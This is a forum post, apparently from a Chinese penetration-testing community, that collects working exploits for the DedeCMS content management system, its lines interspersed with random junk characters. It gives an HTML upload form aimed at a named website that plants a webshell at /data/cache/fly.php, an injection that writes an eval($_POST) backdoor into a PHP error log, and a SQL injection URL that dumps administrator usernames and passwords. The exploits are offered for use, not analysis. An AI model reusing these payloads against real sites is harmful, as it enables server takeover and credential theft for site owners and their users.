" o8 D+ @& ^# ^! k
4 m5 Q* n  D% F7 W/ l" L7 r4 v8 V8 i# M. i# m0 J+ g' J3 X
; z7 M! ?0 {. v1 f6 b

  B1 ?; p- Y* X1 \9 X$ A6 x! b4 l: R% [8 a6 J1 o
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞1 M- w  ]  T" ~4 w
<html>
0 H5 q; U8 ?2 T2 d. Z6 x<head>' C! s( }+ h; W( l
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
/ ?" J! A+ F/ k8 ?: R- I% k</head>
( p' \  O# w& l0 l" H<body style="FONT-SIZE: 9pt">
+ W% H& s4 `* v% h* H4 c! s---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
5 @! a* q* B8 a<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>( e$ I3 W! Z& P/ v( Z7 F7 v! `
<input type='hidden' name='activepath' value='/data/cache/' />* L% I$ J& _- j
<input type='hidden' name='cfg_basedir' value='../../' />
: t$ e0 f: S/ G6 u, s<input type='hidden' name='cfg_imgtype' value='php' />& a! u; n# s5 O8 D6 o5 j) b9 Z
<input type='hidden' name='cfg_not_allowall' value='txt' />
2 x9 S' G0 J  g2 G<input type='hidden' name='cfg_softtype' value='php' />) t# s# F! C+ w. |
<input type='hidden' name='cfg_mediatype' value='php' />
+ H" P& q, C. w& `+ k  M<input type='hidden' name='f' value='form1.enclosure' />3 [# x( i- ?0 d
<input type='hidden' name='job' value='upload' />
! ]* u  ^* T) b9 L% u1 ~; k1 g<input type='hidden' name='newname' value='fly.php' />$ m1 J! S9 n$ Y8 a2 F: n4 Z) {4 d
Select U Shell <input type='file' name='uploadfile' size='25' />! b: I4 ]/ [6 T
<input type='submit' name='sb1' value='确定' />" Y3 K3 `- r* V! ]: D- O; c
</form>
7 C( }! W5 b' Q4 P6 Q4 x<br />It's just a exp for the bug of Dedecms V55...<br />- D, v! W' @, o; C  O
Need register_globals = on...<br />
# ?/ ?" M4 d/ v$ N# N0 NFun the game,get a webshell at /data/cache/fly.php...<br />
% m, x' l: r' N0 }+ c</body>& C( G) C0 f' R& c' y( c* `
</html>0 B6 G7 y: ]& k3 U0 p- n/ \
+ i4 k2 T: ^) ]

! O/ O' s6 V+ c6 @
! R& Z3 b1 ~' E$ s* f
0 E. t% h  N$ E) a' R7 v, L
, T; b* h- g. U
. l( G& f/ a% K7 p. s6 a% l0 r: ^3 N2 b# }
- _7 W/ M& h: p/ ^; D( E( E1 Y
/ r1 f8 i# u3 e+ |0 f' u& P7 u

: J% u* l  {! m织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞/ |8 }3 f4 l% ~  u+ q1 |
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
, E6 Z8 c* C* N1 g" b- A/ O$ ?$ a1. 访问网址:8 q& B! h+ d) F: k& Q! i
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?># E2 M" ~, M3 T  F( ]+ V
可看见错误信息2 u3 u5 l; a0 w

# M% H4 x+ b% |) M$ Q1 g, {8 g. ^
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。0 P" q1 y; h* \/ t
int(3) Error: Illegal double '1024e1024' value found during parsing! t( B  T/ \/ V' K, X% s: D/ Q
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
( }( a& i9 h- m  U2 @4 r- r) j
* J/ T% k9 Y: }9 p) t
, E! N2 ~# s. _2 g3 H3 F$ a9 I3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
* @% d( U- |& `& ]" i$ s, C: m* h. F% K" c, l5 C3 T$ [, q3 h3 W

& Y* g# T3 `' U<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>: Y! V0 O+ |/ ?& {: {) f

$ u+ W+ r. ?1 z! q6 Z5 C* z0 q
  o) t! x1 u+ g9 w# W( B/ R2 ]按确定后的看到第2步骤的信息表示文件木马上传成功.
* |0 R& a6 A/ `2 n$ V! I% x" @- N9 n: u# O! Q3 T7 j% u1 x- {. C. ~

' `  [! S8 b1 x3 a2 B$ I
/ M. n! ~9 g- ?, D: H+ D3 a2 v# z5 R! O- {

/ \% I% U7 R; b
  s9 ]* ]$ }  n0 s
, |0 n  |  w) z- b% ~  Y
7 R- S5 v" l- O0 Z& a: x
# t: y1 ]+ C1 x8 L9 O# k2 z. |5 T
5 T/ p( T  Z  b) x- m. A
3 G# n+ ?" R8 O8 S; v+ `. x: Z
; p( B6 q9 C0 y, {# x: l+ i* ?7 b织梦(DedeCms)plus/infosearch.php 文件注入漏洞
+ B6 x  m' x. z9 _http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2